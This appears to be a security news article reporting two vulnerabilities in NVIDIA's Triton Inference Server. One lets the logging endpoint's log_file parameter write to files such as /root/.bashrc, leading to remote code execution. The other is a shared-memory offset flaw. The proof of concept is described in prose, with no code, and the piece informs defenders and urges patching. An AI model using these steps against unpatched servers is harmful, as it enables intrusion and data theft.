NVIDIA Triton Server Flaw Let Attackers Execute Remote Code


Two critical vulnerabilities have been discovered in NVIDIA’s Triton Inference Server, a widely used AI inference server.

These vulnerabilities, CVE-2024-0087 and CVE-2024-0088, pose severe risks, including remote code execution and arbitrary address writing, potentially compromising the security of AI models and sensitive data.

The first vulnerability, CVE-2024-0087, involves the Triton Server’s log configuration interface.

The /v2/logging endpoint accepts a log_file parameter, allowing users to set an absolute path for log file writing.

Attackers can exploit this feature to write arbitrary files, including critical system files like /root/.bashrc or /etc/environment.

By injecting malicious shell scripts into these files, attackers can achieve remote code execution when the server executes the scripts.

Proof of Concept

A proof of concept (POC) demonstrates the exploitability of this vulnerability.

An attacker can write a command to a critical file by sending a crafted POST request to the logging interface.

For instance, writing to /root/.bashrc and then executing a command to confirm the attack showcases the potential for severe damage.

CVE-2024-0088: Inadequate Parameter Validation

The second vulnerability, CVE-2024-0088, stems from inadequate parameter validation in Triton Server’s shared memory handling. This flaw allows arbitrary address writing through the output result process.

An attacker can cause a segmentation fault by manipulating the shared_memory_offset and shared_memory_byte_size parameters, leading to potential memory data leakage.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

Proof of Concept

A POC for CVE-2024-0088 involves registering a shared memory region and then making an inference request with a malicious offset.

This results in a segmentation fault, demonstrating the vulnerability’s impact on the server’s stability and security.

Implications and Industry Response

The discovery of these vulnerabilities highlights the critical need for robust AI security measures.

Exploiting these flaws could lead to unauthorized access, data theft, and manipulation of AI model results, posing significant risks to user privacy and corporate interests.

Companies relying on Triton Server for AI services must urgently apply patches and enhance security protocols to mitigate these threats.

As AI technology advances, ensuring the security of AI infrastructure is paramount.

The vulnerabilities in NVIDIA’s Triton Inference Server are a stark reminder of the ongoing challenges in AI security, necessitating vigilant efforts to protect against potential exploits.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free



Source link